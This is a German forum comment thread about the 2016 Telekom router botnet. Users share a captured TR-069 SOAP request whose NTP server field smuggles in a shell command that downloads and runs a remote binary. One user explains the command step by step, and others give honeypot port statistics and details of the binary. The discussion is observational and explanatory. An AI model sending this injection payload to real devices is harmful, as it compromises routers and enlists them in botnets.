1. Foren
  2. Kommentare
  3. Security
  4. Alle Kommentare zum Artikel
  5. › Botnetz: Telekom-Routerausfälle waren…

Die dürften ziemlich aktiv sein.

  1. Thema

Neues Thema Ansicht wechseln


  1. Die dürften ziemlich aktiv sein.

    Autor: frostbitten king 29.11.16 - 11:13

    Hab mal bei meiner Linux Kiste den Port freigegeben, und mit netcat gelauscht. Hat keine 10 Sekunden gedauert, dann kam folgende Request.
    <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://tr069.pw/1;chmod 777 1;./1`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>

    Hier, der interessante Teil: `cd /tmp;wget http://tr069.pw/1;chmod 777 1;./1`.

  2. Re: Die dürften ziemlich aktiv sein.

    Autor: h3lmut 29.11.16 - 11:31

    ich finde deinen Beitrag interessant und arbeitserleichternd :-D denn ich hätte das gleiche heute abend nach der Arbeit auch ausprobiert und so muss ich es nicht mehr ;-)

    lass dich von so einem Forum troll nicht provozieren

  3. Re: Die dürften ziemlich aktiv sein.

    Autor: frostbitten king 29.11.16 - 11:33

    Hehe, danke. Wenns schon einem geholfen hat, freut mich das. Ich kommentier das jetzt nicht detailierter, dass man an dem Nickname (Chefin) vermuten kann, und was das über sie aussagt.

  4. Re: Die dürften ziemlich aktiv sein.

    Autor: RipClaw 29.11.16 - 11:35

    frostbitten king schrieb:
    --------------------------------------------------------------------------------
    > Hab mal bei meiner Linux Kiste den Port freigegeben, und mit netcat
    > gelauscht. Hat keine 10 Sekunden gedauert, dann kam folgende Request.
    > <?xml version="1.0"?> `cd /tmp;wget tr069.pw 777 1;./1`
    >
    > Hier, der interessante Teil: `cd /tmp;wget tr069.pw 777 1;./1`.

    Hab es gerade auch ausprobiert. Die scheinen das wirklich in alle Netze zu spammen. Also kein konzentrierter Angriff auf bestimmte Netzwerke.

  5. Re: Die dürften ziemlich aktiv sein.

    Autor: GottZ 29.11.16 - 12:23

    jup. konnte den payload sogar in frankreich mit meinem ovh server empfangen.

  6. Re: Die dürften ziemlich aktiv sein.

    Autor: der_wahre_hannes 30.11.16 - 11:13

    Hatte ich mir gestern schon gedacht, dass die bestimmt nicht allein die Telekom ins Visier genommen haben. Hier war das Glück im Unglück, dass viele Kunden von Ausfällen betroffen waren, so dass da gehandelt werden musste und der Angriff deshalb aufgefallen ist.
    Ich bin mir sicher, dass der Angriff anderswo 1. erfolgreich und 2. unbemerkt abgelaufen ist.

    PS: Ich darf nicht nach "cd /tmp;wget http://tr069.pw/1;chmod 777 1;./1" suchen, der Virenscanner der Firma schlägt sofort Alarm. >_>

  7. Re: Die dürften ziemlich aktiv sein.

    Autor: mainframe 30.11.16 - 13:34

    Die Frage ist jetzt noch... wo kommen die Anfragen her :-)

  8. Re: Die dürften ziemlich aktiv sein.

    Autor: Bendix 30.11.16 - 14:02

    Kann mir (nicht It-ler) jemand erklären, was der "interessante" Teil bedeutet?

  9. Re: Die dürften ziemlich aktiv sein.

    Autor: |=H 30.11.16 - 14:42

    cd /tmp;
    wechselt in das Verzeichnis tmp

    wget http://tr069.pw/1;
    lädt die Datei 1 von http://tr069.pw runter

    chmod 777 1;
    ändert die Rechte für die Datei 1, so dass jeder diese Datei lesen, schreiben und ausführen kann

    ./1
    führt die Datei 1 aus



    1 mal bearbeitet, zuletzt am 30.11.16 14:45 durch |=H.

  10. Re: Die dürften ziemlich aktiv sein.

    Autor: Bendix 30.11.16 - 14:44

    :D

    Vielen Dank!

  11. Re: Die dürften ziemlich aktiv sein.

    Autor: der_wahre_hannes 30.11.16 - 16:19

    Die Frage ist auch, was macht die Datei 1 eigentlich? Ist jemand so mutig und lädt sich den Kram mal runter? :D

  12. Re: Die dürften ziemlich aktiv sein.

    Autor: Jolla 30.11.16 - 16:28

    Der heutige Tag:

    Port Anzahl Prozent
    23 855 31
    22 636 23
    7547 266 10

    Und ich bin bei einem kleinen, regionalen Anbieter.

  13. Re: Die dürften ziemlich aktiv sein.

    Autor: dukki 01.12.16 - 09:18

    der_wahre_hannes schrieb:
    --------------------------------------------------------------------------------
    > Die Frage ist auch, was macht die Datei 1 eigentlich? Ist jemand so mutig
    > und lädt sich den Kram mal runter? :D


    Kann den DNS nicht mehr auflösen.
    Sind mehrere DNS Adressen bekannt, oder handelt es sich bei der 069 um Scriptkiddy Zufall?

    Innerlich habe ich immer noch die dumme Vorstellung, dass eine kleine Gruppe von Scriptkiddys einen sehr talentierten Blackhat gefunden haben und etwas "trollen" möchten.
    Diese Kombination hört sich vielleicht lächerlich an, ist jedoch eine sehr explosive Mischung....

  14. Re: Die dürften ziemlich aktiv sein.

    Autor: Moe479 01.12.16 - 10:02

    stellt mal nen webserver auf port 80 in die wildnis ... dessen log wächst in beachtlicher geschwindigkeit an, allein durch 404 beantwortete anfragen von bots auf der suche nach alten pma installationen ... das geht jetzt aber bestimmt schon seit 10 jahren so richtig penetrant ab ... das ding hier ist schweitzer-analog-käse.

    zumindest hier zulande sind solche scans zwar verboten aber man benötigt ja lediglich ne ip ausm anderem teil der welt um sich dahingwhend schlank zu machen ...

    darauf garnicht oder nur sehr verzögert, nahe am timeout, zu antworten treibt zumindest deren aufwand in die höhe ... imho könnten die provider schon solchen offensichtlichen spam präventiv rauskanten, bzw. sollten hosts die z.b. als honeypott fungieren sollen so etwas aktiv erlauben müssen ... nur mal so als idee einer lösung.

  15. Re: Die dürften ziemlich aktiv sein.

    Autor: Moe479 01.12.16 - 10:33

    ich meine das hat durchaus schon volkswirtschaftlich schädliche dimensionen erreicht, denn milliarden von endgeräten haben dadurch eine last, die die netzbetreiber viel günstiger abfangen könnten.

  16. Re: Die dürften ziemlich aktiv sein.

    Autor: kendon 01.12.16 - 14:15

    Da gehört nicht unbedingt Mut dazu, eher Wissen was man damit tun sollte und was nicht. Die Files sind Binärdateien für verschiedene Linux-Architecturen:

    1: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
    2: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
    3: ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
    4: ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
    5: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
    6: ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
    7: ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped

    Sind wohl die "Clients" des Botnetzes.

    Kann es sein dass die Angriffe gestern abend aufgehört haben? An meinem Server kam gestern nach 22 Uhr nix mehr an, davor im Durchschnitt alle 5 Minuten...

  17. Re: Die dürften ziemlich aktiv sein.

    Autor: Jolla 01.12.16 - 20:21

    Moe479 schrieb:
    --------------------------------------------------------------------------------
    > stellt mal nen webserver auf port 80 in die wildnis ... dessen log wächst
    > in beachtlicher geschwindigkeit an, allein durch 404 beantwortete anfragen
    > von bots auf der suche nach alten pma installationen ...

    Aber nicht in einem IP Range von dynamisch vergebenen IPs. Das interessiert dort weniger Leute. Von heute, da taucht das TR Dingens schon nicht mehr auf.

    Port Anzahl Prozent
    23 1034 52
    22 262 13
    443 130 7
    5555 69 3
    2323 57 3
    80 39 2



    1 mal bearbeitet, zuletzt am 01.12.16 20:22 durch Jolla.

  1. Thema

Neues Thema Ansicht wechseln


Um zu kommentieren, loggen Sie sich bitte ein oder registrieren Sie sich. Sie müssen ausserdem in Ihrem Account-Profil unter Forum einen Nutzernamen vergeben haben. Zum Login

Stellenmarkt
  1. Universität Passau, Passau
  2. Hessisches Ministerium der Finanzen, Wiesbaden
  3. Schwarz Dienstleistung KG, Neckarsulm
  4. über duerenhoff GmbH, Schwalmstadt

Golem pur
  • Golem.de ohne Werbung nutzen

Anzeige
Hardware-Angebote
  1. (u. a. Xbox Wireless Controller Robot White für 59,99€)
  2. (reduzierte Überstände, Restposten & Co.)


Haben wir etwas übersehen?

E-Mail an news@golem.de